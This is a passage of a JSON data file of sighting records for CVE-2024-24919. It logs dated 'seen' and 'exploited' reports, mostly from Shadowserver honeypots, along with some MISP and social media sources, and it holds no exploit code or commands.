"creation_timestamp": "2025-02-28T00:00:00.000000Z"}, {"uuid": "bc7fb1bf-4943-4d10-8b38-f090b4b004a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-21)", "content": "", "creation_timestamp": "2025-03-21T00:00:00.000000Z"}, {"uuid": "e246a1ee-b683-4635-9e9c-0c4f37cfb026", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-19)", "content": "", "creation_timestamp": "2025-03-19T00:00:00.000000Z"}, {"uuid": "d6b8df70-21db-4ca7-886c-454ee2a0cab4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-20)", "content": "", "creation_timestamp": "2025-03-20T00:00:00.000000Z"}, {"uuid": "b2e57936-d9f2-429a-bdb5-03d040eb8bc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-17)", "content": "", "creation_timestamp": "2025-03-17T00:00:00.000000Z"}, {"uuid": "a0f9cec0-7350-45e8-a30b-0ef5588c576f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:55.000000Z"}, {"uuid": "dd5507ca-c0cc-4e3a-8dcf-819c2b069f8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-22)", "content": "", "creation_timestamp": "2025-03-22T00:00:00.000000Z"}, {"uuid": "61509e28-3986-4b1c-9c15-d62347b223e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-28)", "content": "", "creation_timestamp": "2025-03-28T00:00:00.000000Z"}, {"uuid": "0d5b7cd5-9dec-4846-9465-ae4fc823b08b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-02)", "content": "", "creation_timestamp": "2025-03-02T00:00:00.000000Z"}, {"uuid": "e577318b-0f5a-4790-96de-41a3b2f5df8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-06)", "content": "", "creation_timestamp": "2025-03-06T00:00:00.000000Z"}, {"uuid": "88b63e32-863c-4778-bc84-86cc17c4587c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-15)", "content": "", "creation_timestamp": "2025-03-15T00:00:00.000000Z"}, {"uuid": "c3f38e66-e975-4ce9-be28-9ea3085b3e99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-15)", "content": "", "creation_timestamp": "2025-03-15T00:00:00.000000Z"}, {"uuid": "48cf1091-5879-49e0-a918-843bffa2819c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://bsky.app/profile/malwhere.bsky.social/post/3liwgwvhtxk24", "content": "", "creation_timestamp": "2025-02-24T13:22:09.664765Z"}, {"uuid": "d65525a7-2712-48fc-a0da-c13534c70055", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://bsky.app/profile/malwhere.bsky.social/post/3liwgx2og2224", "content": "", "creation_timestamp": "2025-02-24T13:22:10.173778Z"}, {"uuid": "46e9edbb-cad1-467d-983d-81405999b158", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://bsky.app/profile/malwhere.bsky.social/post/3liwgx2ohyk24", "content": "", "creation_timestamp": "2025-02-24T13:22:10.674018Z"}, {"uuid": "5999ce9d-cb7c-4a4a-b1d8-58448cbf44cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-01)", "content": "", "creation_timestamp": "2025-04-01T00:00:00.000000Z"}, {"uuid": "48bcce62-f53b-4b95-93e6-3fc7c5737ae8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-27)", "content": "", "creation_timestamp": "2025-03-27T00:00:00.000000Z"}, {"uuid": "e0809a8c-c7ea-49b8-890b-5581ded4eae0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-02)", "content": "", "creation_timestamp": "2025-04-02T00:00:00.000000Z"}, {"uuid": "823de39a-b663-4a7b-8ee2-3275aebe8a78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-25)", "content": "", "creation_timestamp": "2025-02-25T00:00:00.000000Z"}, {"uuid": "28cabeae-560b-4323-b4e9-6f470c9e2a20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-04)", "content": "", "creation_timestamp": "2025-04-04T00:00:00.000000Z"}, {"uuid": "1849240e-0ed7-4423-9209-3d6ce40e9bee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-14)", "content": "", "creation_timestamp": "2025-07-14T00:00:00.000000Z"}, {"uuid": "df1c70fc-f0a9-4082-9a62-c68f5632ecad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-03)", "content": "", "creation_timestamp": "2025-04-03T00:00:00.000000Z"}, {"uuid": "30768c6f-cbf2-48d6-990c-002d1e2b64ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-05)", "content": "", "creation_timestamp": "2025-04-05T00:00:00.000000Z"}, {"uuid": "a80974ac-692c-4c7e-b20a-4a3d84e3d9f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-06)", "content": "", "creation_timestamp": "2025-04-06T00:00:00.000000Z"}, {"uuid": "3d753824-9c85-4a9b-b40b-fabc50e25023", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-09)", "content": "", "creation_timestamp": "2025-04-09T00:00:00.000000Z"}, {"uuid": "db4f1766-0a12-45b7-aa35-9399afad2591", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-06)", "content": "", "creation_timestamp": "2025-04-06T00:00:00.000000Z"}, {"uuid": "ce2dac05-d5da-452a-bd3f-f4d4e99ad462", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-07)", "content": "", "creation_timestamp": "2025-04-07T00:00:00.000000Z"}, {"uuid": "27c15a34-3015-4e87-86a3-d840d2be2274", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "MISP/dcf911ee-17b3-4902-aa15-4ecabf2e40ce", "content": "", "creation_timestamp": "2025-06-19T23:26:58.000000Z"}, {"uuid": "a9782f25-6be2-4747-92f1-ce9311780e9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-09)", "content": "", "creation_timestamp": "2025-04-09T00:00:00.000000Z"}, {"uuid": "95bd0178-5e4f-4f1b-b3ea-d86e20fa39b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-08)", "content": "", "creation_timestamp": "2025-04-08T00:00:00.000000Z"}, {"uuid": "50f2cfa3-3e44-4182-a900-722573139bcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-10)", "content": "", "creation_timestamp": "2025-04-10T00:00:00.000000Z"}, {"uuid": "af92796d-7014-4dfc-840a-a2a623064789", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-15)", "content": "", "creation_timestamp": "2025-05-15T00:00:00.000000Z"}, {"uuid": "6f4d2d9a-2f16-48b2-9454-a953035d12c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-11)", "content": "", "creation_timestamp": "2025-04-11T00:00:00.000000Z"}, {"uuid": "e6879855-7ef5-4a6f-8702-9e670dd2983e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-12)", "content": "", "creation_timestamp": "2025-04-12T00:00:00.000000Z"}, {"uuid": "f94bdb64-a36e-4e16-b1be-fd75ff5710a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-13)", "content": "", "creation_timestamp": "2025-04-13T00:00:00.000000Z"}, {"uuid": "24a95b96-f23e-46cd-b986-ff78d456b545", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-12)", "content": "", "creation_timestamp": "2025-04-12T00:00:00.000000Z"}, {"uuid": "0842944f-380e-4777-b088-86c22ec267a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-16)", "content": "", "creation_timestamp": "2025-04-16T00:00:00.000000Z"}, {"uuid": "bc9928f7-33db-488e-b1db-cbc1d5bd4479", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-15)", "content": "", "creation_timestamp": "2025-04-15T00:00:00.000000Z"}, {"uuid": "764a5f38-f8c4-4504-9b80-c5938717a7b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-14)", "content": "", "creation_timestamp": "2025-04-14T00:00:00.000000Z"}, {"uuid": "3b4fb055-e385-40b6-9561-5be19f72437b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-14)", "content": "", "creation_timestamp": "2025-04-14T00:00:00.000000Z"}, {"uuid": "c0e03dd3-53c2-4e69-9331-952ee42be1c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-01)", "content": "", "creation_timestamp": "2025-07-01T00:00:00.000000Z"}, {"uuid": "36e243b2-7374-4206-b262-4aec93b3fc13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-20)", "content": "", "creation_timestamp": "2025-04-20T00:00:00.000000Z"}, {"uuid": "a26acdb1-f4b5-4cdb-90fe-52e4973c3a07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-16)", "content": "", "creation_timestamp": "2025-04-16T00:00:00.000000Z"}, {"uuid": "3cce2a28-d5c2-4b4c-b47e-1d9fcca21fdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-17)", "content": "", "creation_timestamp": "2025-04-17T00:00:00.000000Z"}, {"uuid": "75179a79-8ab3-4c1e-8a63-0f0027a67816", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-03)", "content": "", "creation_timestamp": "2025-06-03T00:00:00.000000Z"}, {"uuid": "918b41f1-2c96-46a8-aae7-967c3e4ac33f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-18)", "content": "", "creation_timestamp": "2025-04-18T00:00:00.000000Z"}, {"uuid": "566ee2c3-d496-40d9-9fdd-e6ec817e0a59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-20)", "content": "", "creation_timestamp": "2025-04-20T00:00:00.000000Z"}, {"uuid": "9b225613-1579-4564-854b-294f1891e3a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-19)", "content": "", "creation_timestamp": "2025-04-19T00:00:00.000000Z"}, {"uuid": "d0387f52-6ecc-4ec5-b05f-da929850951c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-21)", "content": "", "creation_timestamp": "2025-04-21T00:00:00.000000Z"}, {"uuid": "8a6e0ab5-51e3-4951-811a-de0d09cac6d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-19)", "content": "", "creation_timestamp": "2025-04-19T00:00:00.000000Z"}, {"uuid": "250c86b4-5b0a-497c-ae9c-246616c68af1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-22)", "content": "", "creation_timestamp": "2025-04-22T00:00:00.000000Z"}, {"uuid": "3b04839d-b6aa-48b0-9990-28c6f280f1f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-23)", "content": "", "creation_timestamp": "2025-04-23T00:00:00.000000Z"}, {"uuid": "4fe746cc-8b3e-47c4-bec6-3c6e0a611e04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-10)", "content": "", "creation_timestamp": "2025-07-10T00:00:00.000000Z"}, {"uuid": "9600ea05-d771-4243-b965-c48898ae13ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-23)", "content": "", "creation_timestamp": "2025-04-23T00:00:00.000000Z"}, {"uuid": "42c8ac37-42da-49b3-a980-15aafe3df205", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-24)", "content": "", "creation_timestamp": "2025-04-24T00:00:00.000000Z"}, {"uuid": "8debf6b2-b2d9-4fda-8a2a-951e3ac13d7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-16)", "content": "", "creation_timestamp": "2025-06-16T00:00:00.000000Z"}, {"uuid": "9d04e00c-7e95-404d-985e-e37478bcf277", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-24)", "content": "", "creation_timestamp": "2025-04-24T00:00:00.000000Z"}, {"uuid": "be5020da-20d6-4176-88a3-6f09417450f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-19)", "content": "", "creation_timestamp": "2025-05-19T00:00:00.000000Z"}, {"uuid": "5b4faf3e-357f-4002-bfb1-8f7f4394eb08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-06-30)", "content": "", "creation_timestamp": "2025-06-30T00:00:00.000000Z"}, {"uuid": "1cb4ef3b-6602-464c-a84f-3687f091e366", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-06-02)", "content": "", "creation_timestamp": "2025-06-02T00:00:00.000000Z"}, {"uuid": "a13e09c3-11de-4f58-99bb-b33a3f2a7a6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-02)", "content": "", "creation_timestamp": "2025-06-02T00:00:00.000000Z"}, {"uuid": "3d2555c5-86e9-42e6-b239-e0f38626d90d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-28)", "content": "", "creation_timestamp": "2025-04-28T00:00:00.000000Z"}, {"uuid": "7cb9113e-8395-4cf9-b0f8-972e6aada36b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-30)", "content": "", "creation_timestamp": "2025-06-30T00:00:00.000000Z"}, {"uuid": "548d5327-43d6-4495-b73e-cfdfc00384e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-29)", "content": "", "creation_timestamp": "2025-04-29T00:00:00.000000Z"}, {"uuid": "82580111-dfe6-40a7-b7a3-0df8c43402ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-28)", "content": "", "creation_timestamp": "2025-04-28T00:00:00.000000Z"}, {"uuid": "f97c2374-5264-4408-b0c9-db0ce1dc653f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-29)", "content": "", "creation_timestamp": "2025-04-29T00:00:00.000000Z"}, {"uuid": "451c822f-2386-4ab1-acdf-5b5dce31b33c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-e1523a5c-9dce464b104523e0", "content": "", "creation_timestamp": "2025-06-26T08:53:34.965594Z"}, {"uuid": "010145f0-dcf8-454a-b6e5-b9653f3c3f93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-31)", "content": "", "creation_timestamp": "2025-05-31T00:00:00.000000Z"}, {"uuid": "b2c6937a-e356-4e8f-be52-51734d138a7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-30)", "content": "", "creation_timestamp": "2025-04-30T00:00:00.000000Z"}, {"uuid": "6893882b-bbe9-4629-bb49-2ea3eae7d34f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://bsky.app/profile/darkwebinformer.com/post/3lqxgrzkbf222", "content": "", "creation_timestamp": "2025-06-06T18:13:31.943852Z"}, {"uuid": "554ced2d-f073-409d-8833-00d8ce3a841f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-01)", "content": "", "creation_timestamp": "2025-05-01T00:00:00.000000Z"}, {"uuid": "f3ff82e9-cb58-4fa6-bd52-363f6d6ccb35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-24919", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/114637773962213030", "content": "", "creation_timestamp": "2025-06-06T18:13:32.565159Z"}, {"uuid": "e03737d1-0958-4d1d-948e-b3c67f03508e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-24919", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/114637794268734521", "content": "", "creation_timestamp": "2025-06-06T18:18:42.718213Z"}, {"uuid": "a7af78ba-cfa6-4217-b9c7-61b3f546eff7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-23)", "content": "", "creation_timestamp": "2025-06-23T00:00:00.000000Z"}, {"uuid": "ac34ca3d-8f3f-4d28-9843-97da8f7ce010", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": 